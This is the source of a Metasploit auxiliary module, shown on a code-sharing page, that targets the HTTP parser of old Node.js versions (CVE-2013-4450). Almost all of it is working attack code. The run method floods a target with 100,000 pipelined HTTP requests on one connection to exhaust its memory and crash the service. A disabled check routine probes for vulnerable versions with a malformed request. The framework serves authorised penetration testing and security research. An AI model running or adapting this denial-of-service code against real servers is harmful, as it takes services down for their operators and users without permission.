Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/nodejs_pipelining.rb
70460 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Node.js HTTP Pipelining Denial of Service',

15
        'Description' => %q{

16
          This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions

17
          released before 0.10.21 and 0.8.26. The attack sends many pipelined

18
          HTTP requests on a single connection, which causes unbounded memory

19
          allocation when the client does not read the responses.

20
        },

21
        'Author' => [

22
          'Marek Majkowski', # Vulnerability discovery

23
          'titanous',        # Metasploit module

24
          'joev'             # Metasploit module

25
        ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2013-4450' ],

29
          [ 'OSVDB', '98724' ],

30
          [ 'BID', '63229' ],

31
          [ 'URL', 'https://nodejs.org/ja/blog/vulnerability/http-server-pipeline-flood-dos/' ]

32
        ],

33
        'DisclosureDate' => '2013-10-18',

34
        'Notes' => {

35
          'Stability' => [CRASH_SERVICE_DOWN],

36
          'SideEffects' => [],

37
          'Reliability' => []

38
        }

39
      )

40
    )

41


42
    register_options(

43
      [

44
        Opt::RPORT(80),

45
        OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])

46
      ]

47
    )

48
  end

49


50
  # Remove due to false positives and false negatives: https://github.com/rapid7/metasploit-framework/pull/21332

51
  def _check

52
    # http://blog.nodejs.org/2013/08/21/node-v0-10-17-stable/

53
    # check if we are < 0.10.17 by seeing if a malformed HTTP request is accepted

54
    status = Exploit::CheckCode::Safe('Target does not appear to be a vulnerable Node.js server')

55
    connect

56
    sock.put(http_request('GEM'))

57
    begin

58
      response = sock.get_once

59
      status = Exploit::CheckCode::Appears('Node.js accepted a malformed HTTP method, likely < 0.10.17') if response =~ /HTTP/

60
    rescue EOFError

61
      # checking against >= 0.10.17 raises EOFError because there is no

62
      # response to GEM requests

63
      vprint_error('Failed to determine the vulnerable state due to an EOFError (no response)')

64
      return Msf::Exploit::CheckCode::Unknown('No response to malformed HTTP request')

65
    ensure

66
      disconnect

67
    end

68
    status

69
  end

70


71
  def host

72
    host = datastore['RHOST']

73
    host += ':' + datastore['RPORT'].to_s if datastore['RPORT'] != 80

74
    host

75
  end

76


77
  def http_request(method = 'GET')

78
    "#{method} / HTTP/1.1\r\nHost: #{host}\r\n\r\n"

79
  end

80


81
  def run

82
    payload = http_request

83
    begin

84
      print_status('Stressing the target memory...')

85
      connect

86
      datastore['RLIMIT'].times { sock.put(payload) }

87
      print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")

88
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

89
      print_status("Unable to connect to #{host}.")

90
    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error

91
      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")

92
    ensure

93
      disconnect

94
    end

95
  end

96
end

97


98